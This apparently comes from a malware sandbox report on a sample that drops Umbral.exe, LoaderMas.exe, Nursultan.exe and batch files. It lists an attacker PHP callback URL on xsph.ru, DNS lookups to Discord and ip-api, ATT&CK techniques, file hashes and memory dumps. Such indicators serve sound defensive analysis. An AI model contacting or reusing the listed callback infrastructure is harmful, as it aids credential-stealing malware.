http://a0948305.xsph.ru/_Defaultwindows.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&353b74c2c11b51923e96f36d4364b56c=bba95d1e1a7f0067e7a08e0fe06f794f&0fc0d795fe4911cf8ed61e542f1ae4f8=ANzADZ4MTZlJGOycjY4M2NhZjN5QTMxYTZyQDMkFTO0UTN4YDO1QGM&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF

http

StartMenuExperienceHost.exe

3.1kB
118.5kB
47
88

HTTP Request

GET http://a0948305.xsph.ru/_Defaultwindows.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&353b74c2c11b51923e96f36d4364b56c=bba95d1e1a7f0067e7a08e0fe06f794f&0fc0d795fe4911cf8ed61e542f1ae4f8=ANzADZ4MTZlJGOycjY4M2NhZjN5QTMxYTZyQDMkFTO0UTN4YDO1QGM&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF

HTTP Response

403

HTTP Request

GET http://a0948305.xsph.ru/_Defaultwindows.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&353b74c2c11b51923e96f36d4364b56c=bba95d1e1a7f0067e7a08e0fe06f794f&0fc0d795fe4911cf8ed61e542f1ae4f8=ANzADZ4MTZlJGOycjY4M2NhZjN5QTMxYTZyQDMkFTO0UTN4YDO1QGM&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF

HTTP Response

403
127.0.0.1:30683

LoaderMas.exe
127.0.0.1:30683

LoaderMas.exe
127.0.0.1:30683

LoaderMas.exe
127.0.0.1:30683

LoaderMas.exe
127.0.0.1:30683

LoaderMas.exe
127.0.0.1:30683

LoaderMas.exe
127.0.0.1:30683

LoaderMas.exe
127.0.0.1:30683

LoaderMas.exe

8.8.8.8:53

154.239.44.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

154.239.44.20.in-addr.arpa
8.8.8.8:53

105.83.221.88.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

105.83.221.88.in-addr.arpa
8.8.8.8:53

gstatic.com

dns

Umbral.exe

57 B
73 B
1
1

DNS Request

gstatic.com

DNS Response

172.217.16.227
8.8.8.8:53

ip-api.com

dns

LoaderMas.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

227.16.217.172.in-addr.arpa

dns

73 B
140 B
1
1

DNS Request

227.16.217.172.in-addr.arpa
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

71 B
95 B
1
1

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

76.32.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

76.32.126.40.in-addr.arpa
8.8.8.8:53

97.17.167.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

97.17.167.52.in-addr.arpa
8.8.8.8:53

ip-api.com

dns

LoaderMas.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

g.bing.com

dns

56 B
151 B
1
1

DNS Request

g.bing.com

DNS Response

204.79.197.237

13.107.21.237
8.8.8.8:53

237.197.79.204.in-addr.arpa

dns

73 B
143 B
1
1

DNS Request

237.197.79.204.in-addr.arpa
8.8.8.8:53

discord.com

dns

Umbral.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.128.233

162.159.135.232

162.159.136.232

162.159.138.232

162.159.137.232
8.8.8.8:53

233.128.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

233.128.159.162.in-addr.arpa
8.8.8.8:53

71.159.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

71.159.190.20.in-addr.arpa
8.8.8.8:53

57.169.31.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

57.169.31.20.in-addr.arpa
8.8.8.8:53

122.107.17.2.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

122.107.17.2.in-addr.arpa
8.8.8.8:53

a0948305.xsph.ru

dns

StartMenuExperienceHost.exe

62 B
78 B
1
1

DNS Request

a0948305.xsph.ru

DNS Response

141.8.192.103
8.8.8.8:53

103.192.8.141.in-addr.arpa

dns

72 B
99 B
1
1

DNS Request

103.192.8.141.in-addr.arpa
8.8.8.8:53

157.123.68.40.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

157.123.68.40.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

144.107.17.2.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

144.107.17.2.in-addr.arpa
8.8.8.8:53

19.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

19.229.111.52.in-addr.arpa
8.8.8.8:53

26.35.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

26.35.223.20.in-addr.arpa
8.8.8.8:53

30.73.42.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

30.73.42.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
985b3105d8889886d6fd953575c54e08

SHA1
0f9a041240a344d82bac0a180520e7982c15f3cd

SHA256
5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d

SHA512
0fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d8cb3e9459807e35f02130fad3f9860d

SHA1
5af7f32cb8a30e850892b15e9164030a041f4bd6

SHA256
2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

SHA512
045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
0256bd284691ed0fc502ef3c8a7e58dc

SHA1
dcdf69dc8ca8bf068f65d20ef1563bbe283e2413

SHA256
e2fb83098e114084f51ed7187334f861ce670051046c39f338928296ca9a49cf

SHA512
c5b29c1e0a15ddb68b0579848066774fa7cdc6f35087bbbf47c05a5c0dcc1eb3e61b2ddadfbded8c1ed9820e637596a9f08a97db8fb18000d168e6b159060c42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ba169f4dcbbf147fe78ef0061a95e83b

SHA1
92a571a6eef49fff666e0f62a3545bcd1cdcda67

SHA256
5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

SHA512
8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
52afa702b34ab802e2ecd71d9539c829

SHA1
6a6f18158c82910e158d7e27972486c6e4dc5c93

SHA256
992fefff5236c174b6dd74b76a2c5c0d33470bec786ee4b30f5577aea27b8025

SHA512
5e42fead63b34fb62e4173e83e11110543583aece41f736c007d8512e8f23b6713140c9233bf99f9b9d1c3302a2f526bd4d33ed1ce1f777c9e0d9dea25e37639

Download Submit
C:\Users\Admin\AppData\Local\Temp\OOOQfReeqn.bat

Filesize
207B

MD5
e78f932d0eff4899edfc22da5cc43704

SHA1
4915fa24356875484286faa7e551dda9cf9307a2

SHA256
476251c5b0021bb2ecbe2f051dc83d31f48df444f1067cf093742e69dadf504f

SHA512
4b7b2efc604267663b34784b189bd1e91d9453d7c1fa1a4bc721357fad332bed46573ce854c55dd25fff018187195c79ac1886d895abb9d44ce2a78ed5d8ffe4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eveoqp2p.ozg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\LoaderMas.exe

Filesize
63KB

MD5
a0dbdf3af38ead2237ccb781a098a431

SHA1
1434296af6c5530eb036718e860490e0adc3321a

SHA256
6f483da6b36646bf6f33db0c210bd3683ff29428a44d916a2f26a4240c1a9901

SHA512
dd7dc91a2e09b0c3906efbb486fb84d0289dc61338afd75d203f1ab2f49556c9523a8a9abc913363a45dde8194f5b2ee9d3d659807250047331944c39006edc3

Download Submit
C:\Users\Admin\AppData\Roaming\Nursultan (17).exe

Filesize
18.2MB

MD5
ed965403e795c3b563d67c734472ad93

SHA1
6b8b929239d5ef8f1f546c591c67acaf560de4dc

SHA256
6b7473e7177ef0666f6afe36b257d0730dababefc209ee1c5f2da319dbe1633d

SHA512
bd860103c5ac1bcc02bfefc669616a1b0103dfb3c611b0e4499cf4b1fc67d49c9cd57c1839936b75e0f0008aec0f84cb0af712feb334957972661405a137f649

Download Submit
C:\Users\Admin\AppData\Roaming\Nursultan.exe

Filesize
17.9MB

MD5
e504e3fc36fe4d6f182c98923979a779

SHA1
3ba9f1a9a15b79639a20cfcf79c9de31d15a17a6

SHA256
70b7b95bb952b3325476867307fc5bd4df5769b97bbcdd8b60e7b46e1b38e4a0

SHA512
63bbbc3ccf14b2846df64b8edae52b6431df52aa9e03569a28ca239ab02db94bf79ca8a0a30529e35a04ee5845768d752b99e6ce3830ab440c57850180ad1647

Download Submit
C:\Users\Admin\AppData\Roaming\Umbral.exe

Filesize
229KB

MD5
f48ef033300ec9fd3c77afff5c20e95f

SHA1
22d6125b980474b3f54937003a765cdd5352f9a8

SHA256
72ee11a905ca278130f02397422b4cc4944851065ce0072f9888b70c5ad40f1e

SHA512
847ee8cdb14879089c861168d6be90325304df490668a38447b37772423e6dab5e32a5df344ceb58410d3b24cf25cd7221e8768951e5aca14820996a1e8304bc

Download Submit
C:\Users\Admin\AppData\Roaming\t.bat

Filesize
1.1MB

MD5
d85bd59cf0808fb894f60773e1594a0a

SHA1
84b9d205f3ae6ca4f8f1bb938ee8b4d452444cde

SHA256
f3ef597673421e514d7fed82b40d65386c3811c4a8f5553afd59fc632bca8746

SHA512
225788e3e98449f53e6206c585315a37c9ff6ed0b5425b2a98e50c7ac45ab3c187ccf7626f126ba300bd8dbdf89c864e89f85d6264edc89281745b081ec58f97

Download Submit
C:\perfdhcpSvc\Chainprovider.exe

Filesize
827KB

MD5
d2ec227ddac047e735393e58e742fd44

SHA1
7aae5c76378f7cfcff8bb983695fa4c2577a20e2

SHA256
0e679527f2df9f87d33c82023256fac276c36006579d2d71877ccab4be847cce

SHA512
5a11b292a574bd2ca6c225af1e4c9f95004a49ce816cc59a73d4ab6e2a0b007a58ab56e5e0c004901c3ebe4ec06054e6e801f8e659711856857add6d43f38979

Download Submit
C:\perfdhcpSvc\LUps3wjkA6jhdk7xRy8J55z2u.vbe

Filesize
200B

MD5
00b53f3e200522631227cac1a07e0646

SHA1
a0c69d58c7ca10f5fd5e1320b1b2f92081d7fcfe

SHA256
486c050aadc42906113b0c5c8485dff36b0187f343a732542608a91b0565146c

SHA512
22241ae8a31c7e564c9fb652947e4fe17f80c6e94dfe1a3bb5890f6eb97797ee32ccfff5d647eef02bda31bd47c5d95521cd0c6349a01e501e6e064ea6306243

Download Submit
C:\perfdhcpSvc\mStUjP0ksX5N.bat

Filesize
34B

MD5
a9330c6da12d90d5d956ae2bbcf017d7

SHA1
7ebaa14eed80db6d9f0c0c0f1ecab1a9c3f61410

SHA256
b49853470383dce14680f656aca7ea449b1d6aabb3f18d4165ebd7e3e7545393

SHA512
557c91cc1cc0d7309f50e286644a2da543c0283d4a1659f7d31554282ddc48b5f972d98d5a01433078fdbe6cc813bb6f7c120e2307fae48c5d81be44ae823228

Download Submit
memory/1288-0-0x00007FFF66DE3000-0x00007FFF66DE5000-memory.dmp

Filesize
8KB

Download
memory/1288-1-0x0000000000E70000-0x0000000002240000-memory.dmp

Filesize
19.8MB

Download
memory/1816-61-0x00000000001F0000-0x0000000000206000-memory.dmp

Filesize
88KB

Download
memory/2460-30-0x00000000000F0000-0x000000000132A000-memory.dmp

Filesize
18.2MB

Download
memory/2460-62-0x00007FFF66DE0000-0x00007FFF678A1000-memory.dmp

Filesize
10.8MB

Download
memory/2460-31-0x00007FFF66DE0000-0x00007FFF678A1000-memory.dmp

Filesize
10.8MB

Download
memory/3212-73-0x0000028F12F00000-0x0000028F12F22000-memory.dmp

Filesize
136KB

Download
memory/3768-27-0x0000027D57A80000-0x0000027D57AC0000-memory.dmp

Filesize
256KB

Download
memory/3768-96-0x0000027D59810000-0x0000027D5982E000-memory.dmp

Filesize
120KB

Download
memory/3768-91-0x0000027D72270000-0x0000027D722E6000-memory.dmp

Filesize
472KB

Download
memory/3768-190-0x0000027D59850000-0x0000027D5985A000-memory.dmp

Filesize
40KB

Download
memory/3768-191-0x0000027D71FA0000-0x0000027D71FB2000-memory.dmp

Filesize
72KB

Download
memory/3768-92-0x0000027D71F50000-0x0000027D71FA0000-memory.dmp

Filesize
320KB

Download
memory/3768-33-0x00007FFF66DE0000-0x00007FFF678A1000-memory.dmp

Filesize
10.8MB

Download
memory/3768-235-0x00007FFF66DE0000-0x00007FFF678A1000-memory.dmp

Filesize
10.8MB

Download
memory/4404-97-0x0000000000CE0000-0x0000000000DB6000-memory.dmp

Filesize
856KB

Download
memory/5016-115-0x0000000140000000-0x0000000142153000-memory.dmp

Filesize
33.3MB

Download
memory/5016-112-0x00007FFF85290000-0x00007FFF85292000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.